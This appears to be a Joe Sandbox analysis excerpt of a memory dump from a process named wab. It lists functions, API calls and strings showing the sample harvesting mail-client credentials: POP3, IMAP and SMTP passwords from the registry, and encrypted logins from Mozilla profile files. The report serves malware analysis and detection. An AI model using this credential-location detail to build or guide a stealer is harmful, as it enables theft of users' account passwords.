                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8606da5831358c67b4a99ee8b6ad117f72868ee6eb846870c269daa592ef00d8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 575130B1900118BBEF11EB51DD41FEE777CAF04754F5080A7BA0CA6192DBB89B858F98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406B9A Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00406BA4
                                                                                                                                                                                                                      • Part of subcall function 00406A9F: CreateFileA.KERNEL32(R7D,80000000,00000001,00000000,00000003,00000000,00000000,0044368E,?,.8D,00443752,?,?,*.oeaccount,.8D,?), ref: 00406AB1
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00406BC1
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001), ref: 00406BD2
                                                                                                                                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 00406BDF
                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BF2
                                                                                                                                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 00406C01
                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406C0A
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00406C12
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C1E
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00406C29
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00406C32
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2565263379-0
                                                                                                                                                                                                                    • Opcode ID: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                                                    • Instruction ID: 428d7c431cb1422a1915013c6704b220f4cf118cce9454ff27e0024ace88079b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b6e565173029c6444be00b6b2d36f782b825a097f2130a1a97e673a6d3a71af
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2114239904605FFEF105FA4DC4CB9E7FB8EB46755F104035F542E1192DB7489508A69
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406C3D Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00406C45
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406C52
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040C0BB,?), ref: 00406C61
                                                                                                                                                                                                                    • GlobalFix.KERNEL32(00000000), ref: 00406C6E
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00406C77
                                                                                                                                                                                                                    • GlobalUnWire.KERNEL32(00000000), ref: 00406C80
                                                                                                                                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 00406C89
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 00406C99
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpystrlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2315226746-0
                                                                                                                                                                                                                    • Opcode ID: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                                                    • Instruction ID: 8edcd2d2b4f986e571765b3eebb92d88a59871b3330cf63fe52768e208e874e1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee3e5d8b8b8103545cd3f6b58303d98c31de17f75192de6e2f85eb2c234adac6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23F0E93B5047186BD7102FA1BC4CE6BBB2CDB86F96B050039FA0AD6253DE755C0447B9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004033E2 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                    • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                    • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                    • Opcode ID: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                                                    • Instruction ID: 1b90a5eb0bf433dfd26fdc49de6d86aad9c02d214cf5b02dd481862667588e5e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d5d1f6d072cf84e5318d5093311add326f10471678b07e4c74f475588d4acf4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF21F47180151C6EDB51EB11DD82FEE777C9B44705F4004ABBA09B1092DBBC6BC68E59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004016FC Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                    • String ID: E$ E$ E
                                                                                                                                                                                                                    • API String ID: 1865533344-1090515111
                                                                                                                                                                                                                    • Opcode ID: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                                    • Instruction ID: 87a0be596659d04b7e64c8373dbe8b7d58709088cb568d7826d55e868489c559
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9da058ee93427dafffafa38840fabb32167184d36f2f077627326be0874b02b0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0E115A74900209EFCF119F90C905AAE3BB1AF08312F00806AFC156B2A2C7799911DFAA
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0044227B Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0044269A
                                                                                                                                                                                                                    • _strncoll.MSVCRT ref: 004426AA
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00442726
                                                                                                                                                                                                                    • atoi.MSVCRT ref: 00442737
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00442763
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                                                                                                                                                                                                    • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                                                                                                                                                                                                    • API String ID: 1864335961-3210201812
                                                                                                                                                                                                                    • Opcode ID: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                                    • Instruction ID: 53082eb74af2b51306e1b07bdc149dea26fd0daa9c3b29582cc647e8b6ddbc01
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80ec9a29ea78ec2cbe9852ea9064bf10950e9091ede64f5a1b804a11a303e8fe
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90F112B080625CDBFB61CF54D9897DEBBB0EB01308F5881CAD4597B251C7B81A89CF99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0044315E Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                    • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                    • API String ID: 1714764973-479759155
                                                                                                                                                                                                                    • Opcode ID: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                                    • Instruction ID: 5e0940cb4a553810ccd5eed58eee7b2aa7af7a3cc246567a3fd24b3687d2e464
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a22eaacac348120a4584acb678e178257747be7cf0bf62b2cbe4dd5676c6cf3b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD9191B260C7049AF628BB329D43B9B33D8AF50719F10043FF95AB61C2EE6DB905465D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E417 Relevance: 68.7, APIs: 25, Strings: 14, Instructions: 449COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E6BB
                                                                                                                                                                                                                      • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                                      • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                                      • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E70C
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E728
                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,%@,000000FF,?,00000104,?,?,?,?,?,?,0040EC25,?,00000000), ref: 0040E73F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040EC25,?), ref: 0040E75E
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E7C0
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E7D5
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E83A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E850
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E866
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E87C
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E892
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E8A8
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E8C2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                    • String ID: $"$$$$$%@$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                    • API String ID: 3137614212-1813914204
                                                                                                                                                                                                                    • Opcode ID: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                                    • Instruction ID: 60cbd65c12865ccb94f157c96bc1922d811664869268201cbad442dfa9876f55
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 69a064d0c74a5f80a32c9514a74247ccae5cfcd5772a3df6081ef2e910daae95
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9228E218087DA9DDB31D6BC9C456CDBF646B16234F0803DAF1E8BB2D2D7344A46CB66
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040DA89 Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _strcmpi$strlen$_strncoll$atoimemset$memcpy
                                                                                                                                                                                                                    • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                    • API String ID: 594115653-593045482
                                                                                                                                                                                                                    • Opcode ID: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                                    • Instruction ID: 1e907043fac54bf2e371806c1eb24ba38ca233ac5dd260cadef0f6990961d541
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02ac693aacd5f103a4b76259fedb339b3b15ca4c55630f2bd5c8a753d7842cac
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C71D832804204AEFF14ABA1DD02B9E77B5DF91329F21406FF545B21C1EB7D9A18D64C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040E070 Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 279COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040690E: memset.MSVCRT ref: 00406930
                                                                                                                                                                                                                      • Part of subcall function 0040690E: strlen.MSVCRT ref: 0040693B
                                                                                                                                                                                                                      • Part of subcall function 0040690E: strlen.MSVCRT ref: 00406949
                                                                                                                                                                                                                      • Part of subcall function 004086A5: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,0040EC43,?,00000000,?,?,?,?,?,?), ref: 004086C3
                                                                                                                                                                                                                      • Part of subcall function 004086A5: CloseHandle.KERNEL32(?,?), ref: 0040870D
                                                                                                                                                                                                                      • Part of subcall function 00408763: _mbsicmp.MSVCRT ref: 0040879D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E123
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E138
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E19F
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E1B5
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E1CB
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E1E1
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E1F7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040E20A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E225
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E23C
                                                                                                                                                                                                                      • Part of subcall function 00406582: memset.MSVCRT ref: 004065A3
                                                                                                                                                                                                                      • Part of subcall function 00406582: memcmp.MSVCRT ref: 004065CD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E29D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E2B4
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040E2CB
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E2E6
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E2FB
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040E310
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E326
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E33F
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E358
                                                                                                                                                                                                                    • _strcmpi.MSVCRT ref: 0040E374
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                    • String ID: C@$encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                    • API String ID: 4171719235-3249434271
                                                                                                                                                                                                                    • Opcode ID: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                                    • Instruction ID: 4eb083177fa9c3dcba641838e0e399a852ec85db15ddf69852980c8670b79128
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b0d5c0670ed8c74d0c8e3b60901706fc2ec35adaa3e3620046f1bbd10783a5e2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EFA16672D04219AEDF10EBA1DC41ADE77BCAF44304F1044BFF645B7181DA38AA988F59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040FD76 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0040FDA3
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040FDAF
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 0040FDBE
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 0040FDCA
                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000EC), ref: 0040FDD3
                                                                                                                                                                                                                    • GetWindowLongA.USER32(?,000000EC), ref: 0040FDDF
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0040FDF1
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040FDFC
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE10
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0040FE1E
                                                                                                                                                                                                                    • GetDC.USER32 ref: 0040FE57
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 0040FE97
                                                                                                                                                                                                                    • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040FEA8
                                                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 0040FEF5
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040FFB5
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 0040FFC9
                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 0040FFE7
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 0041001D
                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041002D
                                                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041003B
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00410052
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0041005C
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 004100A2
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004100AC
                                                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 004100E4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                    • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                    • Opcode ID: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                                                    • Instruction ID: 60093129ffb9b10d71bc98ba01756b195f92c815bd96d79b3314cc8c80e42073
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a60e0ba97f171743a829e93ce0ff1a0e7cc565a63bc43af7584db32dade8b22
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 62B1DE71108741AFDB20DF68C985E6BBBE9FF88704F00492EF69992261DB75E804CF56
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040243C Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004024E7
                                                                                                                                                                                                                      • Part of subcall function 00410452: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C69,?,?,?,?,00401C69,?,?,?), ref: 0041046D
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402525
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004025EF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                    • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                    • API String ID: 168965057-606283353
                                                                                                                                                                                                                    • Opcode ID: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                                                    • Instruction ID: 01ace8319ffdb9fe87aab8cc910760b0be55d28e69d7af66dfccc1b3ad16f9ad
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d04dcaea7970b63fee6828c7dcfe30098fc49b177350675b76886810d8c329c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 815163B540161CEBEF20DF91DC85ADD7BACAF04318F50846BFA08A6142D7BD9584CF98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004027B0 Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040285B
                                                                                                                                                                                                                      • Part of subcall function 00402994: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029C5
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00402895
                                                                                                                                                                                                                      • Part of subcall function 00402994: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004029F3
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 0040296D
                                                                                                                                                                                                                      • Part of subcall function 0041042B: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402928,?,?,?,?,00402928,?,?), ref: 0041044A
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                    • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                    • API String ID: 1497257669-167382505
                                                                                                                                                                                                                    • Opcode ID: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                                                    • Instruction ID: 24fe9e335227be75b4da69fc4be99485a809f42695e36ab36f90f83f1315ab2f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb3ed3ae92ef97c750fd38775156bd4655232a824b152189a5320ea8a9642570
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 22514DB150060C9BEF25EF61DC85ADD7BA8FF04308F50802BF924661A2DBB99958CF48
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

